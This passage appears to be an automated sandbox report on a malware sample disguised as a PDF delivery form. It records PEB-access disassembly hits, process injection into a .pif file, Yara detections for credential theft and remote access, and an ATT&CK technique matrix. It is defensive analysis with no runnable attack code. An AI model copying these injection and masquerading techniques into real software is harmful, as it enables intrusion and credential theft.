                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A94A35 mov eax, dword ptr fs:[00000030h]5_2_22A94A35
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A94A35 mov eax, dword ptr fs:[00000030h]5_2_22A94A35
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFCA11 mov eax, dword ptr fs:[00000030h]5_2_22AFCA11
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AACA6F mov eax, dword ptr fs:[00000030h]5_2_22AACA6F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AACA6F mov eax, dword ptr fs:[00000030h]5_2_22AACA6F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AACA6F mov eax, dword ptr fs:[00000030h]5_2_22AACA6F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1EA60 mov eax, dword ptr fs:[00000030h]5_2_22B1EA60
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AECA72 mov eax, dword ptr fs:[00000030h]5_2_22AECA72
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AECA72 mov eax, dword ptr fs:[00000030h]5_2_22AECA72
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80A5B mov eax, dword ptr fs:[00000030h]5_2_22A80A5B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80A5B mov eax, dword ptr fs:[00000030h]5_2_22A80A5B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]5_2_22A76A50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]5_2_22A76A50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]5_2_22A76A50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]5_2_22A76A50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]5_2_22A76A50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]5_2_22A76A50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]5_2_22A76A50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B24BB0 mov eax, dword ptr fs:[00000030h]5_2_22B24BB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B24BB0 mov eax, dword ptr fs:[00000030h]5_2_22B24BB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80BBE mov eax, dword ptr fs:[00000030h]5_2_22A80BBE
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80BBE mov eax, dword ptr fs:[00000030h]5_2_22A80BBE
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9EBFC mov eax, dword ptr fs:[00000030h]5_2_22A9EBFC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78BF0 mov eax, dword ptr fs:[00000030h]5_2_22A78BF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78BF0 mov eax, dword ptr fs:[00000030h]5_2_22A78BF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A78BF0 mov eax, dword ptr fs:[00000030h]5_2_22A78BF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFCBF0 mov eax, dword ptr fs:[00000030h]5_2_22AFCBF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1EBD0 mov eax, dword ptr fs:[00000030h]5_2_22B1EBD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A90BCB mov eax, dword ptr fs:[00000030h]5_2_22A90BCB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A90BCB mov eax, dword ptr fs:[00000030h]5_2_22A90BCB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A90BCB mov eax, dword ptr fs:[00000030h]5_2_22A90BCB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70BCD mov eax, dword ptr fs:[00000030h]5_2_22A70BCD
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70BCD mov eax, dword ptr fs:[00000030h]5_2_22A70BCD
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70BCD mov eax, dword ptr fs:[00000030h]5_2_22A70BCD
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9EB20 mov eax, dword ptr fs:[00000030h]5_2_22A9EB20
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9EB20 mov eax, dword ptr fs:[00000030h]5_2_22A9EB20
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B38B28 mov eax, dword ptr fs:[00000030h]5_2_22B38B28
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B38B28 mov eax, dword ptr fs:[00000030h]5_2_22B38B28
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]5_2_22AEEB1D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6CB7E mov eax, dword ptr fs:[00000030h]5_2_22A6CB7E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1EB50 mov eax, dword ptr fs:[00000030h]5_2_22B1EB50
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B06B40 mov eax, dword ptr fs:[00000030h]5_2_22B06B40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B06B40 mov eax, dword ptr fs:[00000030h]5_2_22B06B40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3AB40 mov eax, dword ptr fs:[00000030h]5_2_22B3AB40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B18B42 mov eax, dword ptr fs:[00000030h]5_2_22B18B42
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B24B4B mov eax, dword ptr fs:[00000030h]5_2_22B24B4B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B24B4B mov eax, dword ptr fs:[00000030h]5_2_22B24B4B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70887 mov eax, dword ptr fs:[00000030h]5_2_22A70887
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFC89D mov eax, dword ptr fs:[00000030h]5_2_22AFC89D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC8F9 mov eax, dword ptr fs:[00000030h]5_2_22AAC8F9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAC8F9 mov eax, dword ptr fs:[00000030h]5_2_22AAC8F9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3A8E4 mov eax, dword ptr fs:[00000030h]5_2_22B3A8E4
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9E8C0 mov eax, dword ptr fs:[00000030h]5_2_22A9E8C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1483A mov eax, dword ptr fs:[00000030h]5_2_22B1483A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1483A mov eax, dword ptr fs:[00000030h]5_2_22B1483A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAA830 mov eax, dword ptr fs:[00000030h]5_2_22AAA830
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]5_2_22A92835
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]5_2_22A92835
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]5_2_22A92835
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A92835 mov ecx, dword ptr fs:[00000030h]5_2_22A92835
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]5_2_22A92835
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]5_2_22A92835
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFC810 mov eax, dword ptr fs:[00000030h]5_2_22AFC810
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B06870 mov eax, dword ptr fs:[00000030h]5_2_22B06870
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B06870 mov eax, dword ptr fs:[00000030h]5_2_22B06870
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFE872 mov eax, dword ptr fs:[00000030h]5_2_22AFE872
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFE872 mov eax, dword ptr fs:[00000030h]5_2_22AFE872
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A82840 mov ecx, dword ptr fs:[00000030h]5_2_22A82840
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A74859 mov eax, dword ptr fs:[00000030h]5_2_22A74859
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A74859 mov eax, dword ptr fs:[00000030h]5_2_22A74859
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA0854 mov eax, dword ptr fs:[00000030h]5_2_22AA0854
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]5_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A709AD mov eax, dword ptr fs:[00000030h]5_2_22A709AD
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A709AD mov eax, dword ptr fs:[00000030h]5_2_22A709AD
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF89B3 mov esi, dword ptr fs:[00000030h]5_2_22AF89B3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF89B3 mov eax, dword ptr fs:[00000030h]5_2_22AF89B3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF89B3 mov eax, dword ptr fs:[00000030h]5_2_22AF89B3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFE9E0 mov eax, dword ptr fs:[00000030h]5_2_22AFE9E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA29F9 mov eax, dword ptr fs:[00000030h]5_2_22AA29F9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA29F9 mov eax, dword ptr fs:[00000030h]5_2_22AA29F9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3A9D3 mov eax, dword ptr fs:[00000030h]5_2_22B3A9D3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B069C0 mov eax, dword ptr fs:[00000030h]5_2_22B069C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]5_2_22A7A9D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]5_2_22A7A9D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]5_2_22A7A9D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]5_2_22A7A9D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]5_2_22A7A9D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]5_2_22A7A9D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA49D0 mov eax, dword ptr fs:[00000030h]5_2_22AA49D0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF892A mov eax, dword ptr fs:[00000030h]5_2_22AF892A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B0892B mov eax, dword ptr fs:[00000030h]5_2_22B0892B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE908 mov eax, dword ptr fs:[00000030h]5_2_22AEE908
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AEE908 mov eax, dword ptr fs:[00000030h]5_2_22AEE908
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFC912 mov eax, dword ptr fs:[00000030h]5_2_22AFC912
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A68918 mov eax, dword ptr fs:[00000030h]5_2_22A68918
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A68918 mov eax, dword ptr fs:[00000030h]5_2_22A68918
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB096E mov eax, dword ptr fs:[00000030h]5_2_22AB096E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB096E mov edx, dword ptr fs:[00000030h]5_2_22AB096E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB096E mov eax, dword ptr fs:[00000030h]5_2_22AB096E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B14978 mov eax, dword ptr fs:[00000030h]5_2_22B14978
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B14978 mov eax, dword ptr fs:[00000030h]5_2_22B14978
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A96962 mov eax, dword ptr fs:[00000030h]5_2_22A96962
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A96962 mov eax, dword ptr fs:[00000030h]5_2_22A96962
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A96962 mov eax, dword ptr fs:[00000030h]5_2_22A96962
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFC97C mov eax, dword ptr fs:[00000030h]5_2_22AFC97C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF0946 mov eax, dword ptr fs:[00000030h]5_2_22AF0946
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B0AEB0 mov eax, dword ptr fs:[00000030h]5_2_22B0AEB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B0AEB0 mov eax, dword ptr fs:[00000030h]5_2_22B0AEB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFCEA0 mov eax, dword ptr fs:[00000030h]5_2_22AFCEA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFCEA0 mov eax, dword ptr fs:[00000030h]5_2_22AFCEA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFCEA0 mov eax, dword ptr fs:[00000030h]5_2_22AFCEA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA2E9C mov eax, dword ptr fs:[00000030h]5_2_22AA2E9C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA2E9C mov ecx, dword ptr fs:[00000030h]5_2_22AA2E9C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6AE90 mov eax, dword ptr fs:[00000030h]5_2_22A6AE90
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6AE90 mov eax, dword ptr fs:[00000030h]5_2_22A6AE90

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory allocated: C:\Users\Public\Libraries\xnxcxbpC.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: C:\Users\Public\Libraries\xnxcxbpC.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory allocated: C:\Users\Public\Libraries\xnxcxbpC.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifSection loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeSection unmapped: C:\Users\Public\Libraries\xnxcxbpC.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection unmapped: C:\Users\Public\Libraries\xnxcxbpC.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFSection unmapped: C:\Users\Public\Libraries\xnxcxbpC.pif base address: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeMemory written: C:\Users\Public\Libraries\xnxcxbpC.pif base: 253008Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory written: C:\Users\Public\Libraries\xnxcxbpC.pif base: 2AC008Jump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFMemory written: C:\Users\Public\Libraries\xnxcxbpC.pif base: 253008Jump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFProcess created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pifJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02CD5A78
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: GetLocaleInfoA,0_2_02CDA798
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: GetLocaleInfoA,0_2_02CDA74C
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02CD5B84
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD9194 GetLocalTime,0_2_02CD9194
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CDB714 GetVersionExA,0_2_02CDB714
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      1
                      Native API
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      11
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules
                      1
                      Registry Run Keys / Startup Folder
                      1
                      Access Token Manipulation
                      1
                      Valid Accounts
                      LSASS Memory321
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading
                      411
                      Process Injection
                      1
                      Access Token Manipulation
                      Security Account Manager2
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
